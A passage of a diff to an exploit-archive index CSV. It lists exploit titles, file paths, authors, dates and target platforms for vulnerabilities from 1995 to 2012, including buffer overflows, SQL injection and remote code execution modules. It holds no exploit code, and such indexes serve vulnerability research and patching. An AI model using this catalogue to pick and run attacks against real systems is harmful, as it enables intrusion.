6,Slackware 3 NLS Vuln(2)",1997-02-13,"Solar Designer",multiple,local,0 +19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(1)",1997-02-13,"Last Stage of Delirium",multiple,local,0 +19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(2)",1997-02-13,"Solar Designer",multiple,local,0 19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 mylog/mlog Vulnerability",1997-10-19,"Bryan Berg",php,remote,0 19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 Vulnerability (1)",1998-03-16,Rootshell,hardware,remote,0 19555,platforms/hardware/remote/19555.pl,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 Vulnerability (2)",1998-03-17,Rootshell,hardware,remote,0 -19556,platforms/multiple/local/19556.sh,"BSD 2,CND 1,Sendmail 8.x,FreeBSD 2.1.x,HP-UX 10.x,AIX 4,RedHat 4 Sendmail Daemon Vuln",1996-11-16,"Leshka Zakharoff",multiple,local,0 +19556,platforms/multiple/local/19556.sh,"BSD 2_CND 1_Sendmail 8.x_FreeBSD 2.1.x_HP-UX 10.x_AIX 4_RedHat 4 Sendmail Daemon Vuln",1996-11-16,"Leshka Zakharoff",multiple,local,0 19557,platforms/linux/remote/19557.txt,"John S.2 Roberts AnyForm 1.0/2.0 CGI Semicolon Vulnerability",1995-07-31,"Paul Phillips",linux,remote,0 19558,platforms/linux/remote/19558.c,"OpenLink Software OpenLink 3.2 - Remote Buffer Overflow Vulnerability",1999-10-15,"Tymm Twillman",linux,remote,0 19559,platforms/windows/remote/19559.txt,"Microsoft Internet Explorer 5.0/4.0.1 Javascript URL Redirection Vulnerability",1999-10-18,"Georgi Guninski",windows,remote,0 @@ -16905,22 +16937,27 @@ id,file,description,date,author,platform,type,port 19572,platforms/php/webapps/19572.txt,"WordPress MoodThingy Widget 0.8.7 - Blind SQL Injection",2012-07-04,"Chris Kellum",php,webapps,0 19573,platforms/php/webapps/19573.php,"Tiki Wiki CMS Groupware <= 8.3 - ""unserialize()"" PHP Code Execution",2012-07-04,EgiX,php,webapps,0 19574,platforms/php/webapps/19574.txt,"Webify Link Directory SQL Injection",2012-07-04,"Daniel Godoy",php,webapps,0 -19575,platforms/windows/dos/19575.txt,".Net Framework Tilde Character DoS",2012-07-04,"Soroush Dalili",windows,dos,0 +19575,platforms/windows/dos/19575.txt,".Net Framework - Tilde Character DoS",2012-07-04,"Soroush Dalili",windows,dos,0 19576,platforms/windows/remote/19576.rb,"IBM Rational ClearQuest CQOle Remote Code Execution",2012-07-05,metasploit,windows,remote,0 19577,platforms/windows/remote/19577.py,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (1)",1999-10-31,nas,windows,remote,0 19578,platforms/windows/remote/19578.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (2)",1999-10-31,.rain.forest.puppy,windows,remote,0 +19673,platforms/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 Help File Trojan Vulnerability",1999-12-10,"Pauli Ojanpera",windows,local,0 +19674,platforms/sco/local/19674.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 Privileged Program Debugging Vulnerability",1999-12-10,"Brock Tellier",sco,local,0 +19675,platforms/linux/local/19675.c,"Debian 2.1_Linux kernel 2.0.x_RedHat 5.2 Packet Length with Options Vulnerability",1999-12-08,"Andrea Arcangeli",linux,local,0 +19676,platforms/freebsd/local/19676.c,"FreeBSD 3.3_Linux Mandrake 7.0 - 'xsoldier' Buffer Overflow Vulnerability (1)",2000-05-17,"Brock Tellier",freebsd,local,0 +19677,platforms/linux/local/19677.c,"FreeBSD 3.3_Linux Mandrake 7.0 - 'xsoldier' Buffer Overflow Vulnerability (2)",2000-05-17,"Larry W. Cashdollar",linux,local,0 19580,platforms/windows/remote/19580.txt,"Avirt Gateway Suite 3.3 a/3.5 Mail Server Buffer Overflow (1)",1999-10-31,"Luck Martins",windows,remote,0 19581,platforms/windows/remote/19581.txt,"Avirt Gateway Suite 3.3 a/3.5 Mail Server Buffer Overflow (2)",1999-10-31,"dark spyrit",windows,remote,0 -19582,platforms/unix/local/19582.c,"IRIX <= 6.5,Solaris <= 7.0,Turbolinux 4.2 - 'uum' Buffer Overflow Vulnerability",1999-11-02,UNYUN,unix,local,0 +19582,platforms/unix/local/19582.c,"IRIX <= 6.5_Solaris <= 7.0_Turbolinux 4.2 - 'uum' Buffer Overflow Vulnerability",1999-11-02,UNYUN,unix,local,0 19583,platforms/unix/local/19583.c,"Turbolinux 3.5 b2 - 'canuum' Buffer Overflow Vulnerability",1999-11-02,UNYUN,unix,local,0 19584,platforms/windows/remote/19584.c,"Sky Communications Skyfull 1.1.4 Mail Server MAIL FROM Buffer Overflow",1999-10-30,UNYUN,windows,remote,0 19585,platforms/windows/local/19585.c,"Yamaha MidiPlug 1.1 b-j MidiPlug Buffer Overflow Vulnerability",1999-11-02,UNYUN,windows,local,0 19586,platforms/windows/remote/19586.c,"BTD Studio Zom-Mail 1.0.9 - Buffer Overflow Vulnerability",1999-11-02,UNYUN,windows,remote,0 19587,platforms/windows/remote/19587.txt,"AN-HTTPd 1.2 b CGI Vulnerabilities",1999-11-02,UNYUN,windows,remote,0 19588,platforms/windows/remote/19588.c,"IBM HomePagePrint 1.0 7 - Buffer Overflow Vulnerability",1999-11-02,UNYUN,windows,remote,0 -19589,platforms/windows/remote/19589.txt,"Avirt Gateway Suite 3.3/3.3 a/3.5 - Directory Creation Vulnerability",1999-10-31,"Jesús López de Aguileta",windows,remote,0 +19589,platforms/windows/remote/19589.txt,"Avirt Gateway Suite 3.3/3.3 a/3.5 - Directory Creation Vulnerability",1999-10-31,"Jesús López de Aguileta",windows,remote,0 19590,platforms/unix/local/19590.c,"Hylafax Hylafax 4.0.2 - Buffer Overflow Vulnerability",1999-11-03,"Brock Tellier",unix,local,0 -19591,platforms/windows/remote/19591.txt,"Microsoft Internet Explorer 4.0/5.0,Outlook 98 - window.open Redirect Vulnerability",1999-11-04,"Georgi Guninski",windows,remote,0 +19591,platforms/windows/remote/19591.txt,"Microsoft Internet Explorer 4.0/5.0_Outlook 98 - window.open Redirect Vulnerability",1999-11-04,"Georgi Guninski",windows,remote,0 19592,platforms/windows/remote/19592.asm,"Real Networks GameHouse dldisplay ActiveX control - Port Buffer Overflow (1)",1999-11-04,"dark spyrit",windows,remote,0 19593,platforms/windows/remote/19593.c,"Real Networks GameHouse dldisplay ActiveX control - Port Buffer Overflow (2)",1999-11-04,"dark spyrit",windows,remote,0 19594,platforms/windows/local/19594.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Spoolss.exe DLL Insertion Vulnerability",1999-11-04,"Marc of eEye",windows,local,0 @@ -16929,10 +16966,12 @@ id,file,description,date,author,platform,type,port 19597,platforms/php/webapps/19597.txt,"GuestBook Scripts PHP 1.5 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 19598,platforms/php/webapps/19598.txt,"Freeside SelfService CGI/API 2.3.3 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 19600,platforms/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 -19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal Vulnerability",1999-11-04,"Ussr Labs",windows,remote,0 -19602,platforms/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack Vulnerability",1999-11-05,"Michal Zalewski",linux,local,0 -19603,platforms/windows/remote/19603.txt,"Microsoft Internet Explorer 4.x/5.0,Outlook 2000 0/98 0/Express 4.x - ActiveX CAB File Execution",1999-11-08,Mukund,windows,remote,0 +19603,platforms/windows/remote/19603.txt,"Microsoft Internet Explorer 4.x/5.0_Outlook 2000 0/98 0/Express 4.x - ActiveX CAB File Execution",1999-11-08,Mukund,windows,remote,0 +20122,platforms/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution",2012-07-31,metasploit,windows,remote,8082 +30094,platforms/php/webapps/30094.txt,"DGNews 2.1 Footer.PHP Cross-Site Scripting Vulnerability",2007-05-28,"Jesper Jurcenoks",php,webapps,0 +20120,platforms/windows/remote/20120.pl,"httpdx <= 1.5.4 - Remote Heap Overflow",2012-07-29,st3n,windows,remote,0 19605,platforms/linux/dos/19605.c,"Linux Kernel - fs/eventpoll.c Local Denial of Service",2012-07-05,"Yurij M. Plotnikov",linux,dos,0 +19903,platforms/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 DBMan Information Leakage Vulnerability",2000-05-05,"Black Watch Labs",multiple,remote,0 19607,platforms/windows/remote/19607.c,"Windows 95/98 UNC Buffer Overflow Vulnerability (1)",1999-11-09,UNYUN,windows,remote,0 19608,platforms/windows/remote/19608.c,"Windows 95/98 UNC Buffer Overflow Vulnerability (2)",1999-11-09,UNYUN,windows,remote,0 19609,platforms/freebsd/local/19609.txt,"Muhammad M. Saggaf Seyon 2.14 b Relative Path Vulnerability",1999-11-08,"Shawn Hillis",freebsd,local,0 @@ -16941,7 +16980,7 @@ id,file,description,date,author,platform,type,port 19612,platforms/windows/remote/19612.pl,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow Vulnerability (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0 19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 C&C Server Buffer Overflow",2012-07-06,metasploit,windows,remote,3460 19614,platforms/windows/remote/19614.asm,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow Vulnerability (2)",1999-11-07,"dark spyrit",windows,remote,0 -19615,platforms/unix/remote/19615.c,"ISC BIND <= 8.2.2,IRIX <= 6.5.17,Solaris 7.0 (NXT Overflow & Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,remote,0 +19615,platforms/unix/remote/19615.c,"ISC BIND <= 8.2.2_IRIX <= 6.5.17_Solaris 7.0 (NXT Overflow & Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,remote,0 19616,platforms/windows/remote/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Buffer Overflow Denial of Service",1999-11-08,Interrupt,windows,remote,0 19617,platforms/windows/remote/19617.txt,"NetcPlus SmartServer3 3.5.1 POP Buffer Overflow Vulnerability",1999-11-11,"Ussr Labs",windows,remote,0 19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5.0 Media Player ActiveX Error Message Vulnerability",1999-11-14,"Georgi Guninski",windows,remote,0 @@ -16998,18 +17037,13 @@ id,file,description,date,author,platform,type,port 19670,platforms/solaris/remote/19670.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (3)",2000-11-10,"nikolai abromov",solaris,remote,0 19671,platforms/windows/webapps/19671.rb,"Umbraco CMS Remote Command Execution",2012-07-09,metasploit,windows,webapps,0 19672,platforms/solaris/remote/19672.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (4)",1999-12-10,"Cheez Whiz",solaris,remote,0 -19673,platforms/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 Help File Trojan Vulnerability",1999-12-10,"Pauli Ojanpera",windows,local,0 -19674,platforms/sco/local/19674.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 Privileged Program Debugging Vulnerability",1999-12-10,"Brock Tellier",sco,local,0 -19675,platforms/linux/local/19675.c,"Debian 2.1,Linux kernel 2.0.x,RedHat 5.2 Packet Length with Options Vulnerability",1999-12-08,"Andrea Arcangeli",linux,local,0 -19676,platforms/freebsd/local/19676.c,"FreeBSD 3.3,Linux Mandrake 7.0 - 'xsoldier' Buffer Overflow Vulnerability (1)",2000-05-17,"Brock Tellier",freebsd,local,0 -19677,platforms/linux/local/19677.c,"FreeBSD 3.3,Linux Mandrake 7.0 - 'xsoldier' Buffer Overflow Vulnerability (2)",2000-05-17,"Larry W. Cashdollar",linux,local,0 19678,platforms/windows/local/19678.c,"VDOLive Player 3.0.2 - Buffer Overflow Vulnerability",1999-12-13,UNYUN,windows,local,0 19679,platforms/windows/remote/19679.txt,"Infoseek Ultraseek 2.1/3.1 for NT GET Buffer Overflow Vulnerability",1999-12-15,"Ussr Labs",windows,remote,0 19680,platforms/sco/remote/19680.c,"SCO Unixware 7.1 i2odialogd Remote Buffer Overflow Vulnerability",1999-12-22,"Brock Tellier",sco,remote,0 19681,platforms/solaris/remote/19681.txt,"Solaris 7.0 DMI Denial of Service Vulnerabilities",1999-12-22,"Brock Tellier",solaris,remote,0 -19682,platforms/novell/remote/19682.txt,"Netscape Enterprise Server ,Novell Groupwise 5.2/5.5 GWWEB.EXE Multiple Vulnerabilities",1999-12-19,"Sacha Faust Bourque",novell,remote,0 +19682,platforms/novell/remote/19682.txt,"Netscape Enterprise Server _Novell Groupwise 5.2/5.5 GWWEB.EXE Multiple Vulnerabilities",1999-12-19,"Sacha Faust Bourque",novell,remote,0 19683,platforms/windows/local/19683.c,"Ipswitch IMail 5.0/5.0.5/5.0.6/5.0.7/5.0.8/6.0 Weak Password Encryption Vulnerability",1999-12-19,"Mike Davis",windows,local,0 -19684,platforms/multiple/local/19684.c,"SCO Open Server 5.0.5,IRIX 6.2 ibX11/X11 Toolkit/Athena Widget Library Buffer Overflows Vulnerability",1999-12-20,"Last Stage of Delirium",multiple,local,0 +19684,platforms/multiple/local/19684.c,"SCO Open Server 5.0.5_IRIX 6.2 ibX11/X11 Toolkit/Athena Widget Library Buffer Overflows Vulnerability",1999-12-20,"Last Stage of Delirium",multiple,local,0 19685,platforms/freebsd/local/19685.txt,"Windowmaker wmmon 1.0 b2 Vulnerability",1999-12-22,"Steve Reid",freebsd,local,0 19686,platforms/multiple/remote/19686.txt,"Microsoft Internet Explorer 4/5/5.5/5.0.1 external.NavigateAndFind() Cross-Frame Vulnerability",1999-12-22,"Georgi Guninski",multiple,remote,0 19687,platforms/freebsd/dos/19687.c,"Real Networks Real Server 5.0 ramgen Denial of Service Vulnerability",1999-12-23,bow,freebsd,dos,0 @@ -17047,27 +17081,28 @@ id,file,description,date,author,platform,type,port 19719,platforms/windows/remote/19719.txt,"Microsoft Internet Explorer 4.0/4.0.1/5.0/5.0.1/5.5 preview Security Zone Settings Lag Vulnerability",2000-01-07,"Georgi Guninski",windows,remote,0 19720,platforms/windows/dos/19720.c,"NullSoft Winamp 2.10 Playlist Vulnerability",2000-01-10,"Steve Fewer",windows,dos,0 19721,platforms/multiple/local/19721.txt,"MySQL 3.22.27/3.22.29/3.23.8 GRANT Global Password Changing Vulnerability",2000-02-15,"Viktor Fougstedt",multiple,local,0 -19722,platforms/unix/remote/19722.txt,"RedHat <= 6.1,IRIX <= 6.5.18 lpd Vulnerabilities",2000-01-11,anonymous,unix,remote,0 +19722,platforms/unix/remote/19722.txt,"RedHat <= 6.1_IRIX <= 6.5.18 lpd Vulnerabilities",2000-01-11,anonymous,unix,remote,0 19723,platforms/linux/local/19723.txt,"Corel Linux OS 1.0 get_it PATH Vulnerability",2000-01-12,"Cesar Tascon Alvarez",linux,local,0 19724,platforms/windows/remote/19724.txt,"Mirabilis ICQ 0.99 b 1.1.1.1/3.19 - Remote Buffer Overflow Vulnerability",2000-01-12,"Drew Copley",windows,remote,0 19725,platforms/windows/dos/19725.txt,"Nosque Workshop MsgCore 1.9 - Denial of Service Vulnerability",2000-01-13,"Ussr Labs",windows,dos,0 -19726,platforms/bsd/local/19726.c,"FreeBSD <= 3.4,NetBSD <= 1.4.1,OpenBSD <= 2.6 /proc File Sytem Vulnerability",2000-01-21,Nergal,bsd,local,0 +19726,platforms/bsd/local/19726.c,"FreeBSD <= 3.4_NetBSD <= 1.4.1_OpenBSD <= 2.6 /proc File Sytem Vulnerability",2000-01-21,Nergal,bsd,local,0 19727,platforms/linux/local/19727.c,"Inter7 vpopmail (vchkpw) <= 3.4.11 - Buffer Overflow Vulnerability",2000-01-21,K2,linux,local,0 19728,platforms/windows/local/19728.txt,"Microsoft Systems Management Server 2.0 Default Permissions Vulnerability",1999-12-29,"Frank Monroe",windows,local,0 19729,platforms/linux/remote/19729.c,"Qualcomm qpopper 3.0 - 'LIST' Buffer Overflow Vulnerability",2000-01-10,Zhodiac,linux,remote,0 19730,platforms/windows/remote/19730.c,"A-V Tronics InetServ 3.0 WebMail Long GET Request Vulnerability",2000-01-17,"Greg Hoglund",windows,remote,0 19731,platforms/windows/remote/19731.c,"Microsoft index server 2.0/indexing services for windows 2000 - Directory Traversal",2000-01-26,fredrik.widlund,windows,remote,0 19732,platforms/multiple/remote/19732.html,"Check Point Software Firewall-1 3.0 Script Tag Checking Bypass Vulnerability",2000-01-29,"Arne Vidstrom",multiple,remote,0 -19733,platforms/windows/local/19733.txt,"McAfee 4.0,Network Associates for Windows NT 4.0.2/4.0.3 a,Norton AntiVirus 2000 Recycle Bin Exclusion",1999-12-22,"Neil Bortnak",windows,local,0 +19733,platforms/windows/local/19733.txt,"McAfee 4.0_Network Associates for Windows NT 4.0.2/4.0.3 a_Norton AntiVirus 2000 Recycle Bin Exclusion",1999-12-22,"Neil Bortnak",windows,local,0 19734,platforms/windows/remote/19734.java,"Microsoft Virtual Machine 2000 Series/3000 Series getSystemResource Vulnerability",2000-01-31,"Hiromitsu Takagi",windows,remote,0 19735,platforms/linux/local/19735.txt,"Debian Linux 2.1 - apcd Symlink Vulnerability",2000-02-01,anonymous,linux,local,0 +19889,platforms/windows/remote/19889.c,"Microsoft Windows 95/98 - NetBIOS NULL Name Vulnerability",2000-05-02,"rain forest puppy",windows,remote,0 19737,platforms/windows/remote/19737.c,"H. Nomura Tiny FTPDaemon 0.52 - Multiple Buffer Overflow Vulnerabilities",2000-02-01,UNYUN,windows,remote,0 19738,platforms/windows/remote/19738.txt,"Microsoft Outlook Express 5 Javascript Email Access Vulnerability",2000-02-01,"Georgi Guninski",windows,remote,0 19739,platforms/windows/local/19739.txt,"Microsoft Windows NT 4.0 Recycle Bin Pre-created Folder Vulnerability",2000-02-01,"Arne Vidstron and Nobuo Miwa",windows,local,0 19740,platforms/windows/dos/19740.c,"Jgaa WarFTPd 1.66 x4s/1.67-3 - (CWD/MKD) DoS Vulnerability",2000-02-03,crc,windows,dos,0 19741,platforms/cgi/remote/19741.pl,"Wired Community Software WWWThreads 5.0 SQL Command Input Vulnerability",2000-02-03,"rain forest puppy",cgi,remote,0 -19742,platforms/multiple/remote/19742.txt,"Microsoft iis 3.0/4.0,Microsoft index server 2.0 - Directory Traversal",2000-02-02,Mnemonix,multiple,remote,0 -19743,platforms/windows/remote/19743.txt,"Cat Soft Serv-U 2.5/a/b,Windows 2000/95/98/NT 4.0 Shortcut Vulnerability",2000-02-04,"Ussr Labs",windows,remote,0 +19742,platforms/multiple/remote/19742.txt,"Microsoft iis 3.0/4.0_Microsoft index server 2.0 - Directory Traversal",2000-02-02,Mnemonix,multiple,remote,0 +19743,platforms/windows/remote/19743.txt,"Cat Soft Serv-U 2.5/a/b_Windows 2000/95/98/NT 4.0 Shortcut Vulnerability",2000-02-04,"Ussr Labs",windows,remote,0 19744,platforms/novell/dos/19744.txt,"Novell Groupwise Enhancement Pack 5.5 Enhancement Pack DoS",2000-02-07,"Adam Gray",novell,dos,0 19745,platforms/cgi/remote/19745.txt,"Daniel Beckham The Finger Server 0.82 BETA Pipe Vulnerability",2000-02-04,"Iain Wade",cgi,remote,0 19746,platforms/novell/dos/19746.txt,"Novell BorderManager 3.0/3.5 Audit Trail Proxy DoS Vulnerability",2000-02-04,"Chicken Man",novell,dos,0 @@ -17075,7 +17110,7 @@ id,file,description,date,author,platform,type,port 19748,platforms/windows/remote/19748.txt,"True North Software Internet Anywhere Mail Server 3.1.3 RETR DoS",2000-02-10,"Nobuo Miwa",windows,remote,0 19749,platforms/multiple/remote/19749.txt,"ISC BIND 4.9.7/8.x Traffic Amplification and NS Route Discovery Vulnerability",2000-02-14,Sebastian,multiple,remote,0 19750,platforms/multiple/dos/19750.sh,"Netopia Timbuktu Pro Remote Control 2.0/5.2.1 DoS Vulnerability",2000-02-11,eth0,multiple,dos,0 -19751,platforms/multiple/remote/19751.txt,"Ascom COLTSOHO,Brocade Fabric OS,MatchBox,Win98/NT4,Solaris,Xyplex SNMP World Writeable Community",2000-02-15,"Michal Zalewski",multiple,remote,0 +19751,platforms/multiple/remote/19751.txt,"Ascom COLTSOHO / Brocade Fabric OS / MatchBox / Win98/NT4 / Solaris / Xyplex - SNMP World Writeable Community",2000-02-15,"Michal Zalewski",multiple,remote,0 19752,platforms/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 ARCserver /tmp symlink Vulnerability",2000-02-15,"Shawn Bracken",sco,local,0 19753,platforms/windows/remote/19753.txt,"Microsoft frontpage personal webserver 1.0/personal Web server 4.0 - Directory Traversal",1996-01-17,kiborg,windows,remote,0 19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 autorun.inf Vulnerability",2000-02-18,"Eric Stevens",windows,local,0 @@ -17098,7 +17133,7 @@ id,file,description,date,author,platform,type,port 19774,platforms/hardware/webapps/19774.txt,"TP Link Gateway 3.12.4 - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,hardware,webapps,0 19775,platforms/php/webapps/19775.txt,"Reserve Logic 1.2 Booking CMS - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,php,webapps,0 19776,platforms/windows/local/19776.pl,"ZipItFast PRO 3.0 - Heap Overflow Exploit",2012-07-12,b33f,windows,local,0 -19777,platforms/windows/dos/19777.txt,"IE 9, SharePoint, Lync toStaticHTML HTML Sanitizing Bypass",2012-07-12,"Adi Cohen",windows,dos,0 +19777,platforms/windows/dos/19777.txt,"IE 9_ SharePoint_ Lync toStaticHTML HTML Sanitizing Bypass",2012-07-12,"Adi Cohen",windows,dos,0 19778,platforms/linux/local/19778.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x man - Buffer Overrun (1)",2000-02-26,"Babcia Padlina",linux,local,0 19779,platforms/linux/local/19779.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x man - Buffer Overrun (2)",2000-02-26,"Babcia Padlina",linux,local,0 19780,platforms/multiple/remote/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 DoS Vulnerabilities",2000-02-26,"Jeff Stevens",multiple,remote,0 @@ -17109,37 +17144,37 @@ id,file,description,date,author,platform,type,port 19785,platforms/unix/remote/19785.txt,"The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 - Arbitrary File Inclusion",2000-02-29,"Geoff Hutchison",unix,remote,0 19786,platforms/cgi/remote/19786.txt,"DNSTools Software DNSTools 1.0.8/1.10 Input Validation Vulnerability",2000-03-02,"Jonathan Leto",cgi,remote,0 19787,platforms/linux/local/19787.txt,"Corel Linux OS 1.0 DoSemu Distribution Configuration Vulnerability",2000-03-02,suid,linux,local,0 -19788,platforms/irix/remote/19788.pl,"SGI InfoSearch 1.0,SGI IRIX 6.5.x fname Vulnerability",2000-03-05,rpc,irix,remote,0 +19788,platforms/irix/remote/19788.pl,"SGI InfoSearch 1.0_SGI IRIX 6.5.x fname Vulnerability",2000-03-05,rpc,irix,remote,0 19789,platforms/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Buffer Overflow Vulnerability",2000-03-06,dildog,windows,local,0 19790,platforms/php/webapps/19790.txt,"webpagetest <= 2.6 - Multiple Vulnerabilities",2012-07-13,dun,php,webapps,0 19791,platforms/php/webapps/19791.txt,"WordPress Resume Submissions & Job Postings 2.5.1 - Unrestricted File Upload",2012-07-13,"Chris Kellum",php,webapps,0 19792,platforms/php/webapps/19792.txt,"Joomla KISS Advertiser Remote File & Bypass Upload Vulnerability",2012-07-13,D4NB4R,php,webapps,0 -19793,platforms/php/webapps/19793.txt,"Magento eCommerce Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0 +19830,platforms/windows/remote/19830.txt,"Microsoft Index Server 2.0 - '%20' ASP Source Disclosure Vulnerability",2000-03-31,"David Litchfield",windows,remote,0 19794,platforms/linux/local/19794.txt,"Oracle8i Standard Edition 8.1.5 for Linux Installer Vulnerability",2000-03-05,"Keyser Soze",linux,local,0 19795,platforms/cgi/remote/19795.txt,"Caldera OpenLinux 2.3 - rpm_query CGI Vulnerability",2000-03-05,harikiri,cgi,remote,0 19796,platforms/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 mtr Vulnerability (2)",2000-03-03,"Babcia Padlina",multiple,local,0 19797,platforms/unix/remote/19797.txt,"Sun StarOffice 5.1 - Arbitrary File Read Vulnerability",2000-03-09,"Vanja Hrustic",unix,remote,0 19798,platforms/windows/local/19798.txt,"Microsoft Windows NT 4.0 User Shell Folders Vulnerability",2000-03-09,anonymous,windows,local,0 19799,platforms/windows/dos/19799.txt,"Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name DoS",2000-03-04,anonymous,windows,dos,0 -19800,platforms/multiple/remote/19800.c,"Check Point Software Firewall-1 3.0/1 4.0,Cisco PIX Firewall 4.x/5.x ""ALG"" Client Vulnerability",2000-03-10,"Dug Song",multiple,remote,0 +19800,platforms/multiple/remote/19800.c,"Check Point Software Firewall-1 3.0/1 4.0_Cisco PIX Firewall 4.x/5.x ""ALG"" Client Vulnerability",2000-03-10,"Dug Song",multiple,remote,0 19801,platforms/linux/remote/19801.c,"Michael Sandrof IrcII 4.4-7 - Buffer Overflow Vulnerability",2000-03-10,bladi,linux,remote,0 19802,platforms/linux/local/19802.c,"Sam Hawker wmcdplay 1.0 beta1-2 Buffer Overflow Vulnerability (1)",2000-03-11,Krahmer,linux,local,0 19803,platforms/linux/local/19803.txt,"Sam Hawker wmcdplay 1.0 beta1-2 Buffer Overflow Vulnerability (2)",2000-03-13,"Larry W. Cashdolla",linux,local,0 19804,platforms/linux/local/19804.pl,"AT Computing atsar_linux 1.4 - File Manipulation Vulnerability",2000-03-11,"S. Krahmer",linux,local,0 -19805,platforms/windows/remote/19805.txt,"GameHouse dldisplay ActiveX control 0,Real Server 5.0/7.0 Internal IP Address Disclosure",2000-03-08,tschweikle,windows,remote,0 +19805,platforms/windows/remote/19805.txt,"GameHouse dldisplay ActiveX control 0_Real Server 5.0/7.0 Internal IP Address Disclosure",2000-03-08,tschweikle,windows,remote,0 19806,platforms/windows/dos/19806.c,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (1)",2000-03-14,"Ussr Labs",windows,dos,0 19807,platforms/windows/dos/19807.txt,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (2)",2000-03-14,"Ussr Labs",windows,dos,0 19808,platforms/cgi/remote/19808.txt,"Generation Terrorists Designs & Concepts Sojourn 2.0 File Access Vulnerability",2000-03-14,"Cerberus Security Team",cgi,remote,0 19809,platforms/windows/remote/19809.txt,"Oracle Web Listener 4.0.x for NT Batch File Vulnerability",2000-03-15,"Cerberus Security Team",windows,remote,0 19810,platforms/windows/dos/19810.txt,"Atrium Software Mercur WebView WebMail-Client 1.0 - Buffer Overflow",2000-03-16,"Ussr Labs",windows,dos,0 -19811,platforms/linux/local/19811.c,"Halloween Linux 4.0,RedHat Linux 6.1/6.2 imwheel Vulnerability (1)",2000-03-13,funkysh,linux,local,0 -19812,platforms/linux/local/19812.c,"Halloween Linux 4.0,RedHat Linux 6.1/6.2 imwheel Vulnerability (2)",2000-03-13,"S. Krahmer & Stealth",linux,local,0 -19813,platforms/linux/local/19813.txt,"Halloween Linux 4.0,S.u.S.E. Linux 6.0/6.1/6.2/6.3 kreatecd Vulnerability",2000-03-16,Sebastian,linux,local,0 +19811,platforms/linux/local/19811.c,"Halloween Linux 4.0_RedHat Linux 6.1/6.2 imwheel Vulnerability (1)",2000-03-13,funkysh,linux,local,0 +19812,platforms/linux/local/19812.c,"Halloween Linux 4.0_RedHat Linux 6.1/6.2 imwheel Vulnerability (2)",2000-03-13,"S. Krahmer & Stealth",linux,local,0 +19813,platforms/linux/local/19813.txt,"Halloween Linux 4.0_S.u.S.E. Linux 6.0/6.1/6.2/6.3 kreatecd Vulnerability",2000-03-16,Sebastian,linux,local,0 19814,platforms/multiple/remote/19814.c,"Netscape Enterprise Server 3.0/3.6/3.51 - Directory Indexing Vulnerability",2000-03-17,"Gabriel Maggiotti",multiple,remote,0 19815,platforms/windows/remote/19815.txt,"vqsoft vqserver for windows 1.9.9 - Directory Traversal Vulnerability",2000-03-21,"Johan Nilsson",windows,remote,0 -19816,platforms/linux/local/19816.txt,"gpm 1.18.1/1.19,Debian 2.x,RedHat 6.x,S.u.S.E 5.3/6.x gpm Setgid Vulnerability",2000-03-22,"Egmont Koblinger",linux,local,0 +19816,platforms/linux/local/19816.txt,"gpm 1.18.1/1.19_Debian 2.x_RedHat 6.x_S.u.S.E 5.3/6.x gpm Setgid Vulnerability",2000-03-22,"Egmont Koblinger",linux,local,0 